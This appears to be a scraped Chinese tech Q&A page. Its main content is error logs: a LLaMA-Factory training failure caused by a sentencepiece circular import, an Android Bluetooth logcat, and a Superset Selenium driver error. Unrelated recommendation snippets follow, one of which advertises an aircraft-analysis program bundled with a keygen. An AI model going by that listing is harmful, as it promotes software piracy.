[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 97, in load_tokenizer [rank0]: raise OSError("Failed to load tokenizer.") from e [rank0]: OSError: Failed to load tokenizer. [rank3]: Traceback (most recent call last): [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1863, in _get_module [rank3]: return importlib.import_module("." + module_name, self.__name__) [rank3]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank3]: File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module [rank3]: return _bootstrap._gcd_import(name[level:], package, level) [rank3]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank3]: File "<frozen importlib._bootstrap>", line 1206, in _gcd_import [rank3]: File "<frozen importlib._bootstrap>", line 1178, in _find_and_load [rank3]: File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked [rank3]: File "<frozen importlib._bootstrap>", line 690, in _load_unlocked [rank3]: File "<frozen importlib._bootstrap_external>", line 940, in exec_module [rank3]: File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama_fast.py", line 29, in <module> [rank3]: from .tokenization_llama import LlamaTokenizer [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama.py", line 27, in <module> [rank3]: import sentencepiece as spm [rank3]: File "/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py", line 10, in <module> [rank3]: from . import _sentencepiece [rank3]: ImportError: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank3]: The above exception was the direct cause of the following exception: [rank3]: Traceback (most recent call last): [rank3]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 82, in load_tokenizer [rank3]: tokenizer = AutoTokenizer.from_pretrained( [rank3]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 912, in from_pretrained [rank3]: tokenizer_class_from_name(config_tokenizer_class) is not None [rank3]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 611, in tokenizer_class_from_name [rank3]: return getattr(module, class_name) [rank3]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1851, in __getattr__ [rank3]: module = self._get_module(self._class_to_module[name]) [rank3]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank3]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1865, in _get_module [rank3]: raise RuntimeError( [rank3]: RuntimeError: Failed to import transformers.models.llama.tokenization_llama_fast because of the following error (look up to see its traceback): [rank3]: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank3]: The above exception was the direct cause of the following exception: [rank3]: Traceback (most recent call last): [rank3]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 23, in <module> [rank3]: launch() [rank3]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 19, in launch [rank3]: run_exp() [rank3]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 110, in run_exp [rank3]: _training_function(config={"args": args, "callbacks": callbacks}) [rank3]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 72, in _training_function [rank3]: run_sft(model_args, data_args, training_args, finetuning_args, generating_args, callbacks) [rank3]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/sft/workflow.py", line 48, in run_sft [rank3]: tokenizer_module = load_tokenizer(model_args) [rank3]: ^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank3]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 97, in load_tokenizer [rank3]: raise OSError("Failed to load tokenizer.") from e [rank3]: OSError: Failed to load tokenizer. [rank1]: Traceback (most recent call last): [rank1]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1863, in _get_module [rank1]: return importlib.import_module("." + module_name, self.__name__) [rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank1]: File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module [rank1]: return _bootstrap._gcd_import(name[level:], package, level) [rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank1]: File "<frozen importlib._bootstrap>", line 1206, in _gcd_import [rank1]: File "<frozen importlib._bootstrap>", line 1178, in _find_and_load [rank1]: File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked [rank1]: File "<frozen importlib._bootstrap>", line 690, in _load_unlocked [rank1]: File "<frozen importlib._bootstrap_external>", line 940, in exec_module [rank1]: File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed [rank1]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama_fast.py", line 29, in <module> [rank1]: from .tokenization_llama import LlamaTokenizer [rank1]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama.py", line 27, in <module> [rank1]: import sentencepiece as spm [rank1]: File "/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py", line 10, in <module> [rank1]: from . import _sentencepiece [rank1]: ImportError: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank1]: The above exception was the direct cause of the following exception: [rank1]: Traceback (most recent call last): [rank1]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 82, in load_tokenizer [rank1]: tokenizer = AutoTokenizer.from_pretrained( [rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank1]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 912, in from_pretrained [rank1]: tokenizer_class_from_name(config_tokenizer_class) is not None [rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank1]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 611, in tokenizer_class_from_name [rank1]: return getattr(module, class_name) [rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank1]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1851, in __getattr__ [rank1]: module = self._get_module(self._class_to_module[name]) [rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank1]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1865, in _get_module [rank1]: raise RuntimeError( [rank1]: RuntimeError: Failed to import transformers.models.llama.tokenization_llama_fast because of the following error (look up to see its traceback): [rank1]: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank1]: The above exception was the direct cause of the following exception: [rank1]: Traceback (most recent call last): [rank1]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 23, in <module> [rank1]: launch() [rank1]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 19, in launch [rank1]: run_exp() [rank1]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 110, in run_exp [rank1]: _training_function(config={"args": args, "callbacks": callbacks}) [rank1]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 72, in _training_function [rank1]: run_sft(model_args, data_args, training_args, finetuning_args, generating_args, callbacks) [rank1]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/sft/workflow.py", line 48, in run_sft [rank1]: tokenizer_module = load_tokenizer(model_args) [rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank1]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 97, in load_tokenizer [rank1]: raise OSError("Failed to load tokenizer.") from e [rank1]: OSError: Failed to load tokenizer. [rank2]: Traceback (most recent call last): [rank2]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1863, in _get_module [rank2]: return importlib.import_module("." + module_name, self.__name__) [rank2]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank2]: File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module [rank2]: return _bootstrap._gcd_import(name[level:], package, level) [rank2]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank2]: File "<frozen importlib._bootstrap>", line 1206, in _gcd_import [rank2]: File "<frozen importlib._bootstrap>", line 1178, in _find_and_load [rank2]: File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked [rank2]: File "<frozen importlib._bootstrap>", line 690, in _load_unlocked [rank2]: File "<frozen importlib._bootstrap_external>", line 940, in exec_module [rank2]: File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed [rank2]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama_fast.py", line 29, in <module> [rank2]: from .tokenization_llama import LlamaTokenizer [rank2]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama.py", line 27, in <module> [rank2]: import sentencepiece as spm [rank2]: File "/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py", line 10, in <module> [rank2]: from . import _sentencepiece [rank2]: ImportError: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank2]: The above exception was the direct cause of the following exception: [rank2]: Traceback (most recent call last): [rank2]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 82, in load_tokenizer [rank2]: tokenizer = AutoTokenizer.from_pretrained( [rank2]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank2]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 912, in from_pretrained [rank2]: tokenizer_class_from_name(config_tokenizer_class) is not None [rank2]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank2]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/auto/tokenization_auto.py", line 611, in tokenizer_class_from_name [rank2]: return getattr(module, class_name) [rank2]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank2]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1851, in __getattr__ [rank2]: module = self._get_module(self._class_to_module[name]) [rank2]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank2]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1865, in _get_module [rank2]: raise RuntimeError( [rank2]: RuntimeError: Failed to import transformers.models.llama.tokenization_llama_fast because of the following error (look up to see its traceback): [rank2]: cannot import name '_sentencepiece' from partially initialized module 'sentencepiece' (most likely due to a circular import) (/usr/local/lib/python3.11/dist-packages/sentencepiece/__init__.py) [rank2]: The above exception was the direct cause of the following exception: [rank2]: Traceback (most recent call last): [rank2]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 23, in <module> [rank2]: launch() [rank2]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py", line 19, in launch [rank2]: run_exp() [rank2]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 110, in run_exp [rank2]: _training_function(config={"args": args, "callbacks": callbacks}) [rank2]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/tuner.py", line 72, in _training_function [rank2]: run_sft(model_args, data_args, training_args, finetuning_args, generating_args, callbacks) [rank2]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/train/sft/workflow.py", line 48, in run_sft [rank2]: tokenizer_module = load_tokenizer(model_args) [rank2]: ^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank2]: File "/home/wiseatc/LLaMA-Factory/src/llamafactory/model/loader.py", line 97, in load_tokenizer [rank2]: raise OSError("Failed to load tokenizer.") from e [rank2]: OSError: Failed to load tokenizer. [rank0]:[W703 16:13:30.861219244 ProcessGroupNCCL.cpp:1479] Warning: WARNING: destroy_process_group() was not called before program exit, which can leak resources. For more info, please see https://pytorch.org/docs/stable/distributed.html#shutdown (function operator()) W0703 16:13:31.449512 3913223 torch/distributed/elastic/multiprocessing/api.py:900] Sending process 3913282 closing signal SIGTERM W0703 16:13:31.450263 3913223 torch/distributed/elastic/multiprocessing/api.py:900] Sending process 3913283 closing signal SIGTERM W0703 16:13:31.450724 3913223 torch/distributed/elastic/multiprocessing/api.py:900] Sending process 3913284 closing signal SIGTERM E0703 16:13:31.765744 3913223 torch/distributed/elastic/multiprocessing/api.py:874] failed (exitcode: 1) local_rank: 0 (pid: 3913281) of binary: /usr/bin/python3.11 Traceback (most recent call last): File "/usr/local/bin/torchrun", line 8, in <module> sys.exit(main()) ^^^^^^ File "/usr/local/lib/python3.11/dist-packages/torch/distributed/elastic/multiprocessing/errors/__init__.py", line 355, in wrapper return f(*args, **kwargs) ^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.11/dist-packages/torch/distributed/run.py", line 892, in main run(args) File "/usr/local/lib/python3.11/dist-packages/torch/distributed/run.py", line 883, in run elastic_launch( File "/usr/local/lib/python3.11/dist-packages/torch/distributed/launcher/api.py", line 139, in __call__ return launch_agent(self._config, self._entrypoint, list(args)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.11/dist-packages/torch/distributed/launcher/api.py", line 270, in launch_agent raise ChildFailedError( torch.distributed.elastic.multiprocessing.errors.ChildFailedError: ============================================================ /home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py FAILED ------------------------------------------------------------ Failures: <NO_OTHER_FAILURES> ------------------------------------------------------------ Root Cause (first observed failure): [0]: time : 2025-07-03_16:13:31 host : wiseatc-Super-Server rank : 0 (local_rank: 0) exitcode : 1 (pid: 3913281) error_file: <N/A> traceback : To enable traceback see: https://pytorch.org/docs/stable/elastic/errors.html ============================================================ Traceback (most recent call last): File "/home/wiseatc/.local/bin/llamafactory-cli", line 8, in <module> sys.exit(main()) ^^^^^^ File "/home/wiseatc/LLaMA-Factory/src/llamafactory/cli.py", line 130, in main process = subprocess.run( ^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/subprocess.py", line 569, in run raise CalledProcessError(retcode, process.args, subprocess.CalledProcessError: Command '['torchrun', '--nnodes', '1', '--node_rank', '0', '--nproc_per_node', '4', '--master_addr', '127.0.0.1', '--master_port', '38589', '/home/wiseatc/LLaMA-Factory/src/llamafactory/launcher.py', 'saves/DeepSeek-R1-1.5B-Distill/lora/train_2025-07-03-16-00-01/training_args.yaml']' returned non-zero exit status 1.

03-03 14:15:59.427 2805 4193 D BluetoothSystemServer: BluetoothManagerService: 03-03 14:15:59.427 Package [com.oplus.olc] requested to [Disable]. Reason is APPLICATION_REQUEST 03-03 14:15:59.428 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_DISABLE: mAdapter=[Binder=238562076, createdAt=03-03 14:15:49.725] 03-03 14:15:59.435 2805 4193 D BluetoothSystemServer: BluetoothManagerService: 03-03 14:15:59.435 Package [com.oplus.olc] requested to [Disable]. Reason is APPLICATION_REQUEST 03-03 14:15:59.436 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_DISABLE: mAdapter=[Binder=238562076, createdAt=03-03 14:15:49.725] 03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_HANDLE_DISABLE_DELAYED: disabling:false 03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_HANDLE_DISABLE_DELAYED: handleDisable 03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: handleDisable: Sending off request. 03-03 14:15:59.763 2805 3006 D BluetoothSystemServer: BluetoothManagerService: Re-Queue MESSAGE_HANDLE_DISABLE_DELAYED(1) 03-03 14:15:59.764 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_DISABLE: mAdapter=[Binder=238562076, createdAt=03-03 14:15:49.725] 03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_BLUETOOTH_STATE_CHANGE: prevState=ON newState=TURNING_OFF 03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: No support for AutoOn feature: Not creating a timer 03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: broadcastIntentStateChange: action=BLE_STATE_CHANGED prevState=ON newState=TURNING_OFF 03-03 14:15:59.888 2805 3006 D BluetoothSystemServer: BluetoothManagerService: broadcastIntentStateChange: action=STATE_CHANGED prevState=ON newState=TURNING_OFF 03-03 14:16:00.065 2805 3006 D BluetoothSystemServer: BluetoothManagerService: MESSAGE_HANDLE_DISABLE_DELAYED: disabling:true 03-03 14:16:00.065 2805 3006 D BluetoothSystemServer: BluetoothManagerService: Handle disable is finished

在使用docker启动superset,开启thumbnial后,控制台报错Failed at generating thumbnail Message: Unable to obtain driver for chrome; For documentation on this error, please visit: https://www.selenium.dev/documentation/webdriver/troubleshooting/errors/driver_location superset_worker | Traceback (most recent call last): superset_worker | File "/app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/driver_finder.py", line 67, in _binary_paths superset_worker | output = SeleniumManager().binary_paths(self._to_args()) superset_worker | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ superset_worker | File "/app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/selenium_manager.py", line 55, in binary_paths superset_worker | return self._run(args) superset_worker | ^^^^^^^^^^^^^^^ superset_worker | File "/app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/selenium_manager.py", line 129, in _run superset_worker | raise WebDriverException( superset_worker | selenium.common.exceptions.WebDriverException: Message: Unsuccessful command executed: /app/.venv/lib/python3.11/site-packages/selenium/webdriver/common/linux/selenium-manager --browser chrome --language-binding python --output json; code: 65 superset_worker | {'code': 65, 'message': 'error sending request for url (https://googlechromelabs.github.io/chrome-for-testing/last-known-good-versions-with-downloads.json)', 'driver_path': '', 'browser_path': ''} superset_worker |

大家在看

recommend-type

超实用zimo21取字模软件.7z

超实用zimo21取字模软件.7z
recommend-type

AAA2.5及汉化补丁

Advanced Aircraft Analysis V2.5.1.53 (3A) 在win7 64位上安装测试。有注册机和安装视频。支持winxp和win732位和64位系统。 Darcorp Advanced Aircraft Analysis V2.5.1.53 (AAA) 软件是一款面向于高级用户的飞机设计和仿真分析软件,目前广泛应用于数十个国家的各种机构,已然成为飞机设计、开发、稳定性分析以及飞行控制的工业标准软件。适用于 FAR23、FAR25、UAV无人驾驶飞机与 Military 规范,为全球飞机公司(如波音公司)、政府部门(如 FAA)与学校采用于飞机初步设计、分析、与 3-D 绘图的一套完整软件工具。 Advanced Aircraft Analysis (AAA) 是行业标准的飞机设计,稳定性和控制分析软件。 安装在超过45个国家,AAA所使用的主要航空工程大学,飞机制造商和世界各地的军事组织。 Advanced Aircraft Analysis(AAA)是行业标准的飞机设计 AAA提供了一个功能强大的框架,以支持飞机初步设计迭代和非独特的过程。 AAA计划允许学生和初步设计工程师从早期的大小通过开环和闭环动态稳定性和灵敏度分析的重量,而该机的配置工作在监管和成本的限制。
recommend-type

MultiModalSA:CMU-MOSEI的多模态情感分析架构

多模态 CMU-MOSEI的多模态情感分析体系结构。 描述 该信息库包含四种多模式体系结构以及用于CMU-MOSEI的情感分析的相关培训和测试功能。 在数据文件夹中,提供了转录和标签,以用于的标准培训,验证和测试语句。 可以通过以下链接下载BERT嵌入(文本模式),COVAREP功能(音频模式)和FACET功能(视频模式): BERT嵌入: ://drive.google.com/file/d/13y2xoO1YlDrJ4Be2X6kjtMzfRBs7tBRg/view?usp COVAREP: ://drive.google.com/file/d/1XpRN8xoEMKxubBHaNyEivgRbnVY2iazu/view usp sharing 脸部表情: ://drive.google.com/file/d/1BSjMfKm7FQM8n3HHG5Gn9-dTifULC
recommend-type

MMC.rar_NEC mmc-1_nec-m

NEC控制芯片,09电子设计大赛必用,很好的资料,虽然不是我写的,但是肯定有用
recommend-type

TI-LP5009.pdf

TI-LP5009.pdf

最新推荐

recommend-type

(完整版)基因工程药物干扰素的制备.ppt

(完整版)基因工程药物干扰素的制备.ppt
recommend-type

建施-拓力泰-施工图.dwg

建施-拓力泰-施工图.dwg
recommend-type

Web2.0新特征图解解析

Web2.0是互联网发展的一个阶段,相对于早期的Web1.0时代,Web2.0具有以下显著特征和知识点: ### Web2.0的定义与特点 1. **用户参与内容生产**: - Web2.0的一个核心特征是用户不再是被动接收信息的消费者,而是成为了内容的生产者。这标志着“读写网络”的开始,用户可以在网络上发布信息、评论、博客、视频等内容。 2. **信息个性化定制**: - Web2.0时代,用户可以根据自己的喜好对信息进行个性化定制,例如通过RSS阅读器订阅感兴趣的新闻源,或者通过社交网络筛选自己感兴趣的话题和内容。 3. **网页技术的革新**: - 随着技术的发展,如Ajax、XML、JSON等技术的出现和应用,使得网页可以更加动态地与用户交互,无需重新加载整个页面即可更新数据,提高了用户体验。 4. **长尾效应**: - 在Web2.0时代,即使是小型或专业化的内容提供者也有机会通过互联网获得关注,这体现了长尾理论,即在网络环境下,非主流的小众产品也有机会与主流产品并存。 5. **社交网络的兴起**: - Web2.0推动了社交网络的发展,如Facebook、Twitter、微博等平台兴起,促进了信息的快速传播和人际交流方式的变革。 6. **开放性和互操作性**: - Web2.0时代倡导开放API(应用程序编程接口),允许不同的网络服务和应用间能够相互通信和共享数据,提高了网络的互操作性。 ### Web2.0的关键技术和应用 1. **博客(Blog)**: - 博客是Web2.0的代表之一,它支持用户以日记形式定期更新内容,并允许其他用户进行评论。 2. **维基(Wiki)**: - 维基是另一种形式的集体协作项目,如维基百科,任何用户都可以编辑网页内容,共同构建一个百科全书。 3. **社交网络服务(Social Networking Services)**: - 社交网络服务如Facebook、Twitter、LinkedIn等,促进了个人和组织之间的社交关系构建和信息分享。 4. **内容聚合器(RSS feeds)**: - RSS技术让用户可以通过阅读器软件快速浏览多个网站更新的内容摘要。 5. **标签(Tags)**: - 用户可以为自己的内容添加标签,便于其他用户搜索和组织信息。 6. **视频分享(Video Sharing)**: - 视频分享网站如YouTube,用户可以上传、分享和评论视频内容。 ### Web2.0与网络营销 1. **内容营销**: - Web2.0为内容营销提供了良好的平台,企业可以通过撰写博客文章、发布视频等内容吸引和维护用户。 2. **社交媒体营销**: - 社交网络的广泛使用,使得企业可以通过社交媒体进行品牌传播、产品推广和客户服务。 3. **口碑营销**: - 用户生成内容、评论和分享在Web2.0时代更易扩散,为口碑营销提供了土壤。 4. **搜索引擎优化(SEO)**: - 随着内容的多样化和个性化,SEO策略也必须适应Web2.0特点,注重社交信号和用户体验。 ### 总结 Web2.0是对互联网发展的一次深刻变革,它不仅仅是一个技术变革,更是人们使用互联网的习惯和方式的变革。Web2.0的时代特征与Web1.0相比,更加注重用户体验、社交互动和信息的个性化定制。这些变化为网络营销提供了新的思路和平台,也对企业的市场策略提出了新的要求。通过理解Web2.0的特点和应用,企业可以更好地适应互联网的发展趋势,实现与用户的深度互动和品牌的有效传播。
recommend-type

【C++编程新手必看】:一步步带你制作出风靡全球的“别踩白块儿”游戏

# 摘要 本文全面介绍C++编程在游戏开发中的应用,涵盖了从基础概念到具体实现的多个方面。首先,文章提供了游戏开发环境的搭建指南,包括编译器配置和开发工具的选择。随后,重点介绍了游戏主循环和基本框架的构建,强调了事件处理和渲染技术。在游戏逻辑和交互设计方面,本文阐述了界面布局、事件响应和游戏状态管理的核心实现。为了提升游戏体验,本文还探讨了添加音效和背景音乐以及开发高级游戏特性的方法。最后,文章介绍了性能优化和跨平台发布的过程,包括游戏的打包和针对不同平台的发布策略。本文旨在为C++游戏开发者提供一个实用的开发指南,帮助他们从零开始构建出性能优化、跨平台兼容的游戏。 # 关键字 C++编程;
recommend-type

使用scikit-learn训练模型来预测鸢尾花种类

<think>我们使用scikit-learn库来训练一个分类模型预测鸢尾花种类。鸢尾花数据集是scikit-learn内置的经典数据集,包含三种鸢尾花的四个特征(花萼长度、花萼宽度、花瓣长度、花瓣宽度)和对应的类别标签。步骤:1.导入必要的库和数据集2.数据探索(可选,但建议了解数据)3.数据预处理(如划分训练集和测试集、标准化等)4.选择模型(例如KNN、随机森林等)5.训练模型6.模型评估7.使用模型进行预测下面以KNN(K近邻)算法为例,展示完整流程。</think>### 使用 scikit-learn 训练鸢尾花分类模型 以下是基于 scikit-learn 训练鸢尾花分类模型的
recommend-type

WWF工作流设计器C#源码解析及演示

### WWF工作流设计器控件C#源码知识点 #### 1. WWF(Windows Workflow Foundation)概述 WWF是微软公司推出的一个工作流框架,作为.NET Framework的一部分。它提供了一套丰富的API,用于设计、执行和管理工作流。工作流可以用于各种应用程序,包括Web应用、服务和桌面应用,使得开发者能够将复杂的业务逻辑以工作流的形式表现出来,简化业务流程自动化和管理。 #### 2. 工作流设计器控件(Workflow Designer Control) 工作流设计器控件是WWF中的一个组件,主要用于提供可视化设计工作流的能力。它允许用户通过拖放的方式在界面上添加、配置和连接工作流活动,从而构建出复杂的工作流应用。控件的使用大大降低了工作流设计的难度,并使得设计工作流变得直观和用户友好。 #### 3. C#源码分析 在提供的文件描述中提到了两个工程项目,它们均使用C#编写。下面分别对这两个工程进行介绍: - **WorkflowDesignerControl** - 该工程是工作流设计器控件的核心实现。它封装了设计工作流所需的用户界面和逻辑代码。开发者可以在自己的应用程序中嵌入这个控件,为最终用户提供一个设计工作流的界面。 - 重点分析:控件如何加载和显示不同的工作流活动、控件如何响应用户的交互、控件状态的保存和加载机制等。 - **WorkflowDesignerExample** - 这个工程是演示如何使用WorkflowDesignerControl的示例项目。它不仅展示了如何在用户界面中嵌入工作流设计器控件,还展示了如何处理用户的交互事件,比如如何在设计完工作流后进行保存、加载或执行等。 - 重点分析:实例程序如何响应工作流设计师的用户操作、示例程序中可能包含的事件处理逻辑、以及工作流的实例化和运行等。 #### 4. 使用Visual Studio 2008编译 文件描述中提到使用Visual Studio 2008进行编译通过。Visual Studio 2008是微软在2008年发布的集成开发环境,它支持.NET Framework 3.5,而WWF正是作为.NET 3.5的一部分。开发者需要使用Visual Studio 2008(或更新版本)来加载和编译这些代码,确保所有必要的项目引用、依赖和.NET 3.5的特性均得到支持。 #### 5. 关键技术点 - **工作流活动(Workflow Activities)**:WWF中的工作流由一系列的活动组成,每个活动代表了一个可以执行的工作单元。在工作流设计器控件中,需要能够显示和操作这些活动。 - **活动编辑(Activity Editing)**:能够编辑活动的属性是工作流设计器控件的重要功能,这对于构建复杂的工作流逻辑至关重要。 - **状态管理(State Management)**:工作流设计过程中可能涉及保存和加载状态,例如保存当前的工作流设计、加载已保存的工作流设计等。 - **事件处理(Event Handling)**:处理用户交互事件,例如拖放活动到设计面板、双击活动编辑属性等。 #### 6. 文件名称列表解释 - **WorkflowDesignerControl.sln**:解决方案文件,包含了WorkflowDesignerControl和WorkflowDesignerExample两个项目。 - **WorkflowDesignerControl.suo**:Visual Studio解决方案用户选项文件,该文件包含了开发者特有的个性化设置,比如窗口布局、断点位置等。 - **Thumbs.db**:缩略图缓存文件,由Windows自动生成,用于存储文件夹中的图片缩略图,与WWF工作流设计器控件功能无关。 - **WorkflowDesignerExample**:可能是一个文件夹,包含了示例工程相关的所有文件,或者是示例工程的可执行文件。 - **EULA.txt**:最终用户许可协议文本文件,通常说明了软件的版权和使用许可条件。 综上所述,该文件集包含了WWF工作流设计器控件的完整C#源码以及相应的Visual Studio项目文件,开发者可以利用这些资源深入理解WWF工作流设计器控件的工作机制,并将其应用于实际的项目开发中,实现工作流的设计和管理功能。
recommend-type

CAD数据在ANSA中:完美修复几何数据的策略与方法

# 摘要 CAD数据的准确性和几何完整性对于产品设计和工程分析至关重要。本文首先强调了CAD数据和几何修复的重要性,随后介绍了ANSA软件在处理CAD数据中的角色。通过详细的分析,本文探讨了几何数据的常见问题,以及有效的手动和自动修复技术。文中还提供了几何修复在实际应用中的案例分析,并讨论了行业未来对几何修复技术的需求和新兴技术趋势。文章旨在为CAD数据几何修复提供全面的理论知识、诊断方法和修复策略,并
recommend-type

编写verilog代码实现以上的规格化功能

